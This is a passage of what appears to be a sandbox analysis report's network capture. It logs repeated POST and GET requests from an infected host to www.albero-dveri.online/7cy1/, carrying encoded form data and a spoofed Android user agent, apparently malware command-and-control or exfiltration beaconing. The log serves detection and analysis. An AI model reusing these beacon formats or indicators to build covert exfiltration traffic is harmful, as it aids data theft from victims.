                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  83192.168.11.2049839194.58.112.17480
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:06.968235970 CEST831OUTPOST /7cy1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Origin: http://www.albero-dveri.online
                                                                                  Referer: http://www.albero-dveri.online/7cy1/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 41 73 47 48 4b 68 70 79 59 49 33 49 57 37 77 45 68 62 50 66 6a 64 58 32 48 4e 45 7a 31 32 6e 6e 37 4c 49 62 4d 5a 77 42 38 6f 5a 50 49 63 43 53 5a 6e 74 4c 78 52 55 75 45 75 7a 53 32 56 72 75 44 78 47 6c 58 65 53 32 38 44 2b 37 42 68 72 42 51 4f 2f 65 76 76 7a 65 5a 78 30 4d 4b 35 2f 63 7a 43 51 61 74 55 52 4b 2f 50 4b 55 2b 4f 65 6c 6d 4b 62 58 61 50 54 6d 42 46 36 4a 39 6e 63 35 33 52 31 6b 73 44 49 49 38 2b 70 51 75 74 7a 32 68 70 69 76 31 47 4f 46 58 34 59 48 76 4a 37 49 4f 5a 66 66 38 6d 64 42 4d 46 36 54 64 79 71 47 4b 48 73 74 67 6f 54 4c 54 32 34 66 50 43 79 6e 6a 77 3d 3d
                                                                                  Data Ascii: Xb3xI=AsGHKhpyYI3IW7wEhbPfjdX2HNEz12nn7LIbMZwB8oZPIcCSZntLxRUuEuzS2VruDxGlXeS28D+7BhrBQO/evvzeZx0MK5/czCQatURK/PKU+OelmKbXaPTmBF6J9nc53R1ksDII8+pQutz2hpiv1GOFX4YHvJ7IOZff8mdBMF6TdyqGKHstgoTLT24fPCynjw==
                                                                                  Sep 25, 2024 10:00:07.199125051 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:07 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                                                  Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                                                  Sep 25, 2024 10:00:07.199225903 CEST1246INData Raw: ef e0 23 13 fa 7d 4a 54 d0 93 1d 8c dc 8b 73 11 38 4c e1 9c e9 01 64 c1 39 03 c8 9a 93 b6 3c 72 50 8a 02 fe fe 04 c2 a6 33 d2 3d ce 9e 58 7b ed 4d 83 b3 9b 3c e5 44 67 0c 91 6e d5 f9 74 2a 3d a9 4a 4f 5c 41 46 7c 7f f6 d4 4b c0 f4 dc a9 70 95 79
                                                                                  Data Ascii: #}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9oe#S_'ct)A7!^q>"H5VDYEuz6b /LWyOY@|/tm]77*rU41
                                                                                  Sep 25, 2024 10:00:07.199287891 CEST1289INData Raw: 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f f9 12 2e f2 38 f9 3c fe 4e e4 14 7b 37 f9 5c c7 4c 2a ae 5b a0 d1 14 cf 1c c2 46 79 ba 5b 60 88 0d 25 a3 51 a0 74 f6 37 59 5d 46 3e ad ac de 70 60 47 d2 fb 02
                                                                                  Data Ascii: #Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hnt>iPZ?5fH>a-/CKwP7&k0Z


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  84192.168.11.2049840194.58.112.17480
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:09.733139992 CEST851OUTPOST /7cy1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Origin: http://www.albero-dveri.online
                                                                                  Referer: http://www.albero-dveri.online/7cy1/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 41 73 47 48 4b 68 70 79 59 49 33 49 45 4b 41 45 69 38 6a 66 32 4e 58 31 4d 74 45 7a 38 57 6e 64 37 4c 45 62 4d 59 30 52 38 61 39 50 49 39 79 53 65 56 46 4c 79 52 55 75 50 4f 79 61 79 56 72 68 44 78 4c 47 58 66 75 32 38 44 71 37 42 67 62 42 54 39 6e 66 75 2f 7a 63 52 52 30 4f 55 4a 2f 63 7a 43 51 61 74 55 45 74 2f 4a 69 55 2b 2f 75 6c 70 4f 50 55 45 66 54 68 43 46 36 4a 71 58 63 39 33 52 31 38 73 44 34 6d 38 38 42 51 75 73 44 32 68 39 4f 73 76 57 4f 66 59 59 5a 4e 68 36 53 76 4a 6f 7a 33 31 6b 70 71 4e 6c 43 6d 63 6b 37 63 58 31 59 4a 6a 37 50 35 58 47 42 33 4e 41 7a 38 2b 77 66 4e 32 47 7a 69 39 79 49 77 69 57 62 30 71 57 31 57 41 62 49 3d
                                                                                  Data Ascii: Xb3xI=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a9PI9ySeVFLyRUuPOyayVrhDxLGXfu28Dq7BgbBT9nfu/zcRR0OUJ/czCQatUEt/JiU+/ulpOPUEfThCF6JqXc93R18sD4m88BQusD2h9OsvWOfYYZNh6SvJoz31kpqNlCmck7cX1YJj7P5XGB3NAz8+wfN2Gzi9yIwiWb0qW1WAbI=
                                                                                  Sep 25, 2024 10:00:09.962564945 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                                                  Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                                                  Sep 25, 2024 10:00:09.962594032 CEST1289INData Raw: 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f f9 12 2e f2 38 f9 3c fe 4e e4 14 7b 37 f9 5c c7 4c 2a ae 5b a0 d1 14 cf 1c c2 46 79 ba 5b 60 88 0d 25 a3 51 a0 74 f6 37 59 5d 46 3e ad ac de 70 60 47 d2 fb 02
                                                                                  Data Ascii: #Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hnt>iPZ?5fH>a-/CKwP7&k0Z
                                                                                  Sep 25, 2024 10:00:09.962846994 CEST1246INData Raw: ef e0 23 13 fa 7d 4a 54 d0 93 1d 8c dc 8b 73 11 38 4c e1 9c e9 01 64 c1 39 03 c8 9a 93 b6 3c 72 50 8a 02 fe fe 04 c2 a6 33 d2 3d ce 9e 58 7b ed 4d 83 b3 9b 3c e5 44 67 0c 91 6e d5 f9 74 2a 3d a9 4a 4f 5c 41 46 7c 7f f6 d4 4b c0 f4 dc a9 70 95 79
                                                                                  Data Ascii: #}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9oe#S_'ct)A7!^q>"H5VDYEuz6b /LWyOY@|/tm]77*rU41


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  85192.168.11.2049841194.58.112.17480
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:12.500293970 CEST2578OUTPOST /7cy1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Origin: http://www.albero-dveri.online
                                                                                  Referer: http://www.albero-dveri.online/7cy1/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 41 73 47 48 4b 68 70 79 59 49 33 49 45 4b 41 45 69 38 6a 66 32 4e 58 31 4d 74 45 7a 38 57 6e 64 37 4c 45 62 4d 59 30 52 38 61 31 50 49 4c 6d 53 64 79 5a 4c 39 78 55 75 4d 4f 79 5a 79 56 72 34 44 79 37 61 58 66 69 4d 38 42 53 37 54 79 54 42 57 49 4c 66 6b 2f 7a 63 4f 42 30 50 4b 35 2f 4e 7a 42 34 57 74 55 55 74 2f 4a 69 55 2b 38 32 6c 74 61 62 55 47 66 54 6d 42 46 36 7a 39 6e 63 56 33 58 64 47 73 43 4d 59 39 4d 68 51 76 4d 54 32 79 34 69 73 33 47 4f 5a 4d 34 59 59 68 36 4f 77 4a 6f 76 37 31 6e 31 4d 4e 6d 79 6d 63 41 75 6a 43 6e 41 41 79 49 4b 77 4b 46 6c 49 42 77 2f 43 68 69 48 58 2b 6b 54 50 79 32 6f 37 68 51 50 38 77 33 77 55 62 66 4c 70 4b 48 79 7a 34 52 55 6e 34 74 38 6f 2b 63 59 58 6c 36 36 58 6f 4b 34 79 34 44 69 74 64 55 2b 78 6d 63 49 34 59 4d 30 6c 4f 65 32 39 50 55 71 67 4a 78 51 58 6f 70 71 39 47 44 38 5a 65 4d 58 45 4d 62 77 7a 66 47 42 6e 31 6b 65 75 2f 76 4e 6f 35 76 69 54 57 50 54 75 5a 4f 6e 66 77 78 63 71 73 41 6f 6c 57 53 46 48 46 62 63 4e 44 31 7a 50 45 41 38 46 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a1PILmSdyZL9xUuMOyZyVr4Dy7aXfiM8BS7TyTBWILfk/zcOB0PK5/NzB4WtUUt/JiU+82ltabUGfTmBF6z9ncV3XdGsCMY9MhQvMT2y4is3GOZM4YYh6OwJov71n1MNmymcAujCnAAyIKwKFlIBw/ChiHX+kTPy2o7hQP8w3wUbfLpKHyz4RUn4t8o+cYXl66XoK4y4DitdU+xmcI4YM0lOe29PUqgJxQXopq9GD8ZeMXEMbwzfGBn1keu/vNo5viTWPTuZOnfwxcqsAolWSFHFbcND1zPEA8FiH19J5Z7HfAUTMhc1vFEWJ3MYkSj9JZYvyYFZxBd6OTHAlXO+ORDarI6LgKlZfv5mPgHqbhd3He2yn05UjLGvv02FPgcnsFBIBvBjB1y+dKgYI0SxM7qU1Bqg4gcI7tnvH7WZDWrB4lqVUWARZPaVlouA1yBPDFSNbi5crf+Z8+Y98wi6t5tDoyBtB4XJ/VUz+4Yjv3v3x4AbVea8mhzb2chqbBuSRTRVp6a2TG3Wqw+jMm4E6bK+lZQZDimljHuJ0sDh7T/Bn24sHLDR2QRuwt3gWsmfSz5seHRa4Kzb4F8Eibm4aEk0FmyTNqCrAHPc+Z4FITeuBrjbLpZlmizjT9kajfvzqEUWsAtbnqLDpHhfvNX1wMqP+z69sRtNadpT7PrUM678NzwMdlI/vRJ2Tnm+UZ08+X8bG2n8aFCOACOeoJk4D+iBSQ3tk2ZuABMgGCyWPWpn6iS4XUdigKlDyyvLoQUgU70ccuxUuML/i8Tas1w/ruEC3qwIILCvYM27Yy+1XynijvIOtPBGnAt5wvGdI+uLqzDi21yOAIfLw4m5xoOCgU8lZkBZYNkvLr5HFX0Ys6sCIwn2b5Wszn6z7KM5GoVEEPlsqsAyoVS7rrIr3Eonou3WHJwnJfeUn156z4EQ+gU9aFKhdjTG1I+zZhAqLB0wgbFD+ [TRUNCATED]
                                                                                  Sep 25, 2024 10:00:12.500317097 CEST1289OUTData Raw: 56 55 78 32 65 72 52 6b 68 77 2f 4b 49 44 63 6f 49 69 70 59 59 44 6f 39 6c 51 32 6a 53 44 75 79 75 4a 2b 36 43 35 71 54 6d 35 6e 55 36 71 71 33 68 30 39 74 65 31 63 4a 70 30 45 66 4b 69 48 78 52 2b 65 76 7a 4e 2f 7a 54 79 49 4c 4a 71 38 61 78 42
                                                                                  Data Ascii: VUx2erRkhw/KIDcoIipYYDo9lQ2jSDuyuJ+6C5qTm5nU6qq3h09te1cJp0EfKiHxR+evzN/zTyILJq8axBr2GLLAzMcsxWGSICbYg7nXTMy8J+943Lx3AzJ/a3CnfmscaGNWhTPJk/ppAJX5yR3XSXg+7BGvwOEtJg1lY7IabvTjG68FETYc8T8YvQ/W7Z/y25GfM5BhuW32GMceD/vbckzmZXyWfeuAx9uBSZ9UKXSVSU7wHqY
                                                                                  Sep 25, 2024 10:00:12.500376940 CEST2578OUTData Raw: 77 62 53 65 56 62 72 52 61 2b 62 57 45 55 51 74 4f 58 36 5a 78 42 5a 2f 64 79 65 6f 78 77 55 46 75 7a 33 53 31 4d 55 6d 78 7a 4e 5a 4c 68 33 74 61 42 77 63 36 6e 79 33 4e 56 36 6e 4c 4d 43 48 75 32 54 43 71 6a 55 50 76 6f 4c 6e 39 73 69 73 57 65
                                                                                  Data Ascii: wbSeVbrRa+bWEUQtOX6ZxBZ/dyeoxwUFuz3S1MUmxzNZLh3taBwc6ny3NV6nLMCHu2TCqjUPvoLn9sisWeTC3kaSplJAzPbORe4KN+d6tjxZ4ihgnXT07IR6zRqZRr7gmjRlfv/v+c8uDrcKxC0LoQhYn878YBSnviqCEMpg29XrTd433+pfwr0sMAQipFLk4Q4e1TF7Nblo8IkmStvg3bsFTvonzukC5/Zk2YAHMozNe1yV2Ao
                                                                                  Sep 25, 2024 10:00:12.731959105 CEST1289OUTData Raw: 74 43 56 61 6c 43 68 4a 59 74 71 35 37 4f 68 34 74 35 41 75 62 72 2f 4f 47 42 38 61 49 46 67 2b 36 66 35 2f 59 75 63 36 34 4c 5a 64 42 64 6d 6a 5a 48 70 2f 36 71 46 4d 45 43 6d 61 57 4c 6b 54 4b 52 61 59 36 76 53 31 76 2b 44 37 47 32 5a 6d 71 4b
                                                                                  Data Ascii: tCValChJYtq57Oh4t5Aubr/OGB8aIFg+6f5/Yuc64LZdBdmjZHp/6qFMECmaWLkTKRaY6vS1v+D7G2ZmqK9VVc+JFfm3l+T+pYYtxfS0xBTdO3P1+rlGDpa3V4K/q+TlQYPEr75OPw/DzyUm5zWfSwgvKQl7Y2xrvQdf6k9jLYhp+PruIkcjH0/IB8dezwYFT8UZBj/4luiI7b/84CpIEuSmMkfVTYwIN5NqkGZBkF/8cMD6nlh
                                                                                  Sep 25, 2024 10:00:12.732136011 CEST266OUTData Raw: 7a 64 6a 48 43 54 7a 68 68 33 51 72 4f 4b 71 35 70 65 79 32 61 39 53 36 67 37 6a 32 72 41 39 4b 7a 58 35 44 6b 6e 45 4d 53 6a 6d 47 48 45 58 2b 56 69 39 46 6a 56 43 52 4a 6d 39 61 70 51 2f 77 36 7a 48 53 48 56 45 6b 4d 77 31 71 4c 4d 35 53 59 58
                                                                                  Data Ascii: zdjHCTzhh3QrOKq5pey2a9S6g7j2rA9KzX5DknEMSjmGHEX+Vi9FjVCRJm9apQ/w6zHSHVEkMw1qLM5SYXXoq8MIqDr4otz+TcuFBPO7nH4dOt+VWWySQVDI2VuxKoRYWWRae5wv5xyEu8GrX6NLQHt5d+d7UyMMBWVNIuC46mbsSvGqssqaFB8zsxkL+a5HSGK/eZrh1yJ8D0ozT01+oown9UOc4p7tvoz9P67D1yTHx2LUs5f
                                                                                  Sep 25, 2024 10:00:12.733011007 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:12 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                                                  Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                                                  Sep 25, 2024 10:00:12.733026028 CEST1289INData Raw: 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f f9 12 2e f2 38 f9 3c fe 4e e4 14 7b 37 f9 5c c7 4c 2a ae 5b a0 d1 14 cf 1c c2 46 79 ba 5b 60 88 0d 25 a3 51 a0 74 f6 37 59 5d 46 3e ad ac de 70 60 47 d2 fb 02
                                                                                  Data Ascii: #Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hnt>iPZ?5fH>a-/CKwP7&k0Z
                                                                                  Sep 25, 2024 10:00:12.733040094 CEST1246INData Raw: ef e0 23 13 fa 7d 4a 54 d0 93 1d 8c dc 8b 73 11 38 4c e1 9c e9 01 64 c1 39 03 c8 9a 93 b6 3c 72 50 8a 02 fe fe 04 c2 a6 33 d2 3d ce 9e 58 7b ed 4d 83 b3 9b 3c e5 44 67 0c 91 6e d5 f9 74 2a 3d a9 4a 4f 5c 41 46 7c 7f f6 d4 4b c0 f4 dc a9 70 95 79
                                                                                  Data Ascii: #}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9oe#S_'ct)A7!^q>"H5VDYEuz6b /LWyOY@|/tm]77*rU41


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  86192.168.11.2049842194.58.112.17480
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:15.260222912 CEST553OUTGET /7cy1/?Xb3xI=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 10:00:15.489531994 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:15 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
